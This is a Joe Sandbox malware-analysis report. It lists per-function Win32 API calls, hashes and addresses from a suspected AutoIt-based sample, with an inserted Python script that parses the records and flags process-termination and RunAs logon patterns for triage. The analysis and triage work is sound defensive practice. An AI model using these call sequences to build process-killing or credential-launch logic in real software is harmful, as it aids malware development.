                                                        • Instruction ID: 75cb381f0da7eba8f811f57f1321e17cf8d4603392786c0250c60236f8ef08d5
                                                        • Opcode Fuzzy Hash: b9c405e81976a06735b547bb3fe87fd80e6bd03138587684f195e2698cce9933
                                                        • Instruction Fuzzy Hash: 17416B74504600AFD711DF28C888FBA7BE8FB46734F14467DFAA4862A2C7349845DB62
                                                        APIs
                                                        • ShowWindow.USER32(008857B0,00000000,00ED5230,?,?,008857B0,?,0084B5A8,?,?), ref: 0084B712
                                                        • EnableWindow.USER32(00000000,00000000), ref: 0084B736
                                                        • ShowWindow.USER32(008857B0,00000000,00ED5230,?,?,008857B0,?,0084B5A8,?,?), ref: 0084B796
                                                        • ShowWindow.USER32(00000000,00000004,?,0084B5A8,?,?), ref: 0084B7A8
                                                        • EnableWindow.USER32(00000000,00000001), ref: 0084B7CC
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0084B7EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 8ad250dd4c7be1270ad939c4720179fc0c723c09dcb896ba2ffc72e890a976a2
                                                        • Instruction ID: 194fdad3f456fac035575a1f5340d81156f3058bd5652b717e48fd300cac0aa7
                                                        • Opcode Fuzzy Hash: 8ad250dd4c7be1270ad939c4720179fc0c723c09dcb896ba2ffc72e890a976a2
                                                        • Instruction Fuzzy Hash: 36413E34601248AFDB26CF28C599B957BE1FF45314F1881BAFA48CF6A2C731E856CB51
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00834E41,?,?,00000000,00000001), ref: 008370AC
                                                          • Part of subcall function 008339A0: GetWindowRect.USER32(?,?), ref: 008339B3
                                                        • GetDesktopWindow.USER32 ref: 008370D6
                                                        • GetWindowRect.USER32(00000000), ref: 008370DD
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0083710F
                                                          • Part of subcall function 00825244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
                                                        • GetCursorPos.USER32(?), ref: 0083713B
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00837199
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: f451f74f1a0f80320e8f7b360f5f04cc5ed32e3ad3725861033c915fa57fa4a7
                                                        • Instruction ID: 7de44da942e24475bac082148653d795697dedcf41974c22609101c2b0779234
                                                        • Opcode Fuzzy Hash: f451f74f1a0f80320e8f7b360f5f04cc5ed32e3ad3725861033c915fa57fa4a7
                                                        • Instruction Fuzzy Hash: C231CF72509305ABD720DF14D849F9FBBAAFBC9314F000929F985D7192DA34EA09CBD2
                                                        APIs
                                                          • Part of subcall function 008180A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008180C0
                                                          • Part of subcall function 008180A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008180CA
                                                          • Part of subcall function 008180A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008180D9
                                                          • Part of subcall function 008180A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008180E0
                                                          • Part of subcall function 008180A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008180F6
                                                        • GetLengthSid.ADVAPI32(?,00000000,0081842F), ref: 008188CA
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008188D6
                                                        • HeapAlloc.KERNEL32(00000000), ref: 008188DD
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 008188F6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0081842F), ref: 0081890A
                                                        • HeapFree.KERNEL32(00000000), ref: 00818911
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 3b76935bf2bf3b077e7acfe53a94955518254a28cebbb0d14608571228879b97
                                                        • Instruction ID: 351e4ee03cc76519c7ce715bce50172dbb049290275b45668d0ff4ef99fbab10
                                                        • Opcode Fuzzy Hash: 3b76935bf2bf3b077e7acfe53a94955518254a28cebbb0d14608571228879b97
                                                        • Instruction Fuzzy Hash: 9C118935601609EBDB119BA4DC0ABFE7BACFF85315F108068E985D7211CB32A980DB60
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008185E2
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 008185E9
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008185F8
                                                        • CloseHandle.KERNEL32(00000004), ref: 00818603
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00818632
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00818646
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 193610a47cfa7d3409df55bae6ac91aec33b3d69fdde24a300fc683ee8d7d10c
                                                        • Instruction ID: 07d9f6bf30ef825b6c3358944497b70ccd29fec277ae6fafda91ae4fda130f76
                                                        • Opcode Fuzzy Hash: 193610a47cfa7d3409df55bae6ac91aec33b3d69fdde24a300fc683ee8d7d10c
                                                        • Instruction Fuzzy Hash: DE114776500249EBDF118FA4DD49BDA7BADFF49354F044069FE04A2161C7768DA0EB60
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0081B7B5
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0081B7C6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0081B7CD
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0081B7D5
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0081B7EC
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0081B7FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 23fb97b9f2b93043fc01a63faf397ce761fc44a434ab3bc6471cc7e9734874f2
                                                        • Instruction ID: 52726c70c8c78dd70c3bd633e6e9420a29076a82e974868465366d2a68a8653a
                                                        • Opcode Fuzzy Hash: 23fb97b9f2b93043fc01a63faf397ce761fc44a434ab3bc6471cc7e9734874f2
                                                        • Instruction Fuzzy Hash: 34017175A00219BBEB109BB69C45A5ABFB8FF49351F044069FA08E7291D6309C00CF91
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007E0193
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 007E019B
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007E01A6
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007E01B1
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 007E01B9
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007E01C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 37d9b42932e0d62a9bd7b7bebd28ab7ccc9fdd3432beda5aee4dd64a391d5265
                                                        • Instruction ID: 2f6d9706d5c31c21b260094e0edcacb092bce62a9e093d1ca6d1665eb477b3d3
                                                        • Opcode Fuzzy Hash: 37d9b42932e0d62a9bd7b7bebd28ab7ccc9fdd3432beda5aee4dd64a391d5265
                                                        • Instruction Fuzzy Hash: E7016CB09027597DE3008F5A8C85B52FFA8FF19354F00411FA15C47942C7F5A868CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008253F9
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0082540F
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0082541E
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0082542D
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00825437
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0082543E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: c75e9f9329cc7b1097501eca0c02f2231497ab1b913ec2a59f96725930356c44
                                                        • Instruction ID: fc70d4bec508fbbe84c7e078302c9f27c6dd636e884801ae904529346322bded
                                                        • Opcode Fuzzy Hash: c75e9f9329cc7b1097501eca0c02f2231497ab1b913ec2a59f96725930356c44
                                                        • Instruction Fuzzy Hash: 33F06D36240158BBE3215BA2DC0DEAB7A7CFBC7B11F00016DFA04D105296A01A01C6B5
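The per-function call records above (for instance the WM_CLOSE / OpenProcess / TerminateProcess sequence at 008253F9, or the CreateProcessWithLogonW sequence at 008185E2) are quicker to triage in bulk than by eye. The Python below is an added example and is not Joe Sandbox code nor code from the analysed sample: it parses records in the plain-text layout shown on this page and flags a few call patterns. The constants are standard Win32 values (0x1F0FFF is the pre-Vista PROCESS_ALL_ACCESS mask that appears verbatim in the OpenProcess call; 0x10 is WM_CLOSE); the flag rules are my own heuristics, and the embedded sample text is copied from two records on this page.

```python
"""Parse the per-function "APIs" records of a Joe Sandbox report (plain-text
layout as on this page) and flag call sequences worth a first look.
Added example; not Joe Sandbox code and not from the analysed sample."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two records copied from this page, trimmed to the
# "APIs" list and a couple of Similarity fields.
SAMPLE_REPORT = """\
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008253F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0082540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0082541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?), ref: 0082542D
• TerminateProcess.KERNEL32(00000000,00000000,?), ref: 00825437
• CloseHandle.KERNEL32(00000000,?), ref: 0082543E
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• API String ID: 839392675-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008185E2
• OpenProcessToken.ADVAPI32(00000000), ref: 008185E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008185F8
• CloseHandle.KERNEL32(00000004), ref: 00818603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00818632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00818646
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
"""

@dataclass
class ApiCall:
    api: str          # e.g. OpenProcess
    module: str       # e.g. KERNEL32
    args: List[str]   # raw argument tokens; '?' means the sandbox did not resolve it
    ref: int          # call-site address inside the dump
    subcall: bool     # listed as "Part of subcall function ..."

@dataclass
class FuncRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # API ID, Opcode ID, ...

CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

def parse_records(text: str) -> List[FuncRecord]:
    """Split the report into records; each record starts at an 'APIs' heading."""
    records: List[FuncRecord] = []
    cur: Optional[FuncRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"].upper(), args,
                                     int(m["ref"], 16), m["sub"] is not None))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"].strip()] = m["val"].strip()
    return records

# Standard Win32 values; 0x1F0FFF is the pre-Vista PROCESS_ALL_ACCESS mask.
PROCESS_ALL_ACCESS = 0x1F0FFF
WM_CLOSE = 0x0010

def hexarg(call: ApiCall, idx: int) -> Optional[int]:
    """Argument idx as an int, or None if it is absent or unresolved ('?')."""
    if idx >= len(call.args):
        return None
    try:
        return int(call.args[idx], 16)
    except ValueError:
        return None

def triage_flags(rec: FuncRecord) -> List[str]:
    """Hypothetical heuristics over one record's call sequence (my own rules)."""
    names = [c.api for c in rec.calls]
    flags: List[str] = []
    for i, c in enumerate(rec.calls):
        if c.api == "OpenProcess" and hexarg(c, 0) == PROCESS_ALL_ACCESS \
                and "TerminateProcess" in names[i:]:
            flags.append("opens a foreign process with PROCESS_ALL_ACCESS, then terminates it")
        if c.api in ("PostMessageW", "SendMessageTimeoutW") and hexarg(c, 1) == WM_CLOSE:
            flags.append("asks a window to close (WM_CLOSE)")
        if c.api == "CreateProcessWithLogonW":
            flags.append("creates a process under explicit logon credentials (RunAs)")
    return list(dict.fromkeys(flags))  # de-duplicate, keep first-seen order

if __name__ == "__main__":
    for rec in parse_records(SAMPLE_REPORT):
        print(rec.fields.get("API ID", "?"), "->", "; ".join(triage_flags(rec)) or "no flags")
```

Feed it the report text saved as plain text; the regexes ignore the indentation the export adds. Unresolved arguments ('?') deliberately never match a constant, so a rule only fires on values the sandbox actually recorded.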
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00827243
                                                        • EnterCriticalSection.KERNEL32(?,?,007D0EE4,?,?), ref: 00827254
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,007D0EE4,?,?), ref: 00827261
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,007D0EE4,?,?), ref: 0082726E
                                                          • Part of subcall function 00826C35: CloseHandle.KERNEL32(00000000,?,0082727B,?,007D0EE4,?,?), ref: 00826C3F
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00827281
                                                        • LeaveCriticalSection.KERNEL32(?,?,007D0EE4,?,?), ref: 00827288
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: b3ebd04f5ce30f2b9a6bfa6ff259bacf14a91858a976e6f76bddd16d07f58a95
                                                        • Instruction ID: f502f3239331c30e66270b77c102415d00d75827f71d68499878597844f15da7
                                                        • Opcode Fuzzy Hash: b3ebd04f5ce30f2b9a6bfa6ff259bacf14a91858a976e6f76bddd16d07f58a95
                                                        • Instruction Fuzzy Hash: 5EF05E3A540622EBE7122B64ED4C9DB776AFF46702B100539F603910A2DBB65851CB60
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0081899D
                                                        • UnloadUserProfile.USERENV(?,?), ref: 008189A9
                                                        • CloseHandle.KERNEL32(?), ref: 008189B2
                                                        • CloseHandle.KERNEL32(?), ref: 008189BA
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 008189C3
                                                        • HeapFree.KERNEL32(00000000), ref: 008189CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 1c0f60026aecd9ddc2b9efbed231caec7650d607a5fe23c4c50dfa204f3471ee
                                                        • Instruction ID: 60abb88f713429a29dc0dd8e5ccc73384bb62c5f8521baffa7dd4c6ec1cae04a
                                                        • Opcode Fuzzy Hash: 1c0f60026aecd9ddc2b9efbed231caec7650d607a5fe23c4c50dfa204f3471ee
                                                        • Instruction Fuzzy Hash: FBE0527A104505FBDA021FE5EC0C95AFBA9FB8A762B508639F31981571CB329461DB50
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00838613
                                                        • CharUpperBuffW.USER32(?,?), ref: 00838722
                                                        • VariantClear.OLEAUT32(?), ref: 0083889A
                                                          • Part of subcall function 00827562: VariantInit.OLEAUT32(00000000), ref: 008275A2
                                                          • Part of subcall function 00827562: VariantCopy.OLEAUT32(00000000,?), ref: 008275AB
                                                          • Part of subcall function 00827562: VariantClear.OLEAUT32(00000000), ref: 008275B7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 6409223569cc81c9c15a918d111a0acb2f6e6c870d943c6ae361ed60e8d47413
                                                        • Instruction ID: 2b44ef9bf5780cb8f3b9d77c484bdc985fc452b5d55c05cccc93388dbe3f3aab
                                                        • Opcode Fuzzy Hash: 6409223569cc81c9c15a918d111a0acb2f6e6c870d943c6ae361ed60e8d47413
                                                        • Instruction Fuzzy Hash: 19914371608301DFCB00DF24C48995ABBE4FF89714F14886EF99ACB262DB30E945CB92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_free
                                                        • String ID: 3c}$_}
                                                        • API String ID: 2620147621-2413270705
                                                        • Opcode ID: 70225a941b7ea5841d7739918b11dab47e1e527ee872d8cd2810c6cda33c79fc
                                                        • Instruction ID: 5f944bcc8fb1a6069f3d5d715b2c5014c89625442f9edd2a34161c57084362b0
                                                        • Opcode Fuzzy Hash: 70225a941b7ea5841d7739918b11dab47e1e527ee872d8cd2810c6cda33c79fc
                                                        • Instruction Fuzzy Hash: F85158716053818FDB65CF28C840A6ABBF5FF89314F44482EE98987351EB39E951CB83
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: 3c}$ERCP
                                                        • API String ID: 2532777613-604919223
                                                        • Opcode ID: b003b486a4eea7d7b0bb603bb7cb8a4e71003e738498dc5bacf56179c409fa65
                                                        • Instruction ID: 161513d417028299874abdad26063f2399cd5f2c21bcff4580de49d18e259660
                                                        • Opcode Fuzzy Hash: b003b486a4eea7d7b0bb603bb7cb8a4e71003e738498dc5bacf56179c409fa65
                                                        • Instruction Fuzzy Hash: 7E518E71900309DBDB24DFA5C985BAABBF8FF48314F20856EE54AD6241E774EA848B40
                                                        APIs
                                                        • GetWindowRect.USER32(00EDEDA8,?), ref: 00849863
                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00849896
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00849903
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID: 0R
                                                        • API String ID: 3880355969-1916035689
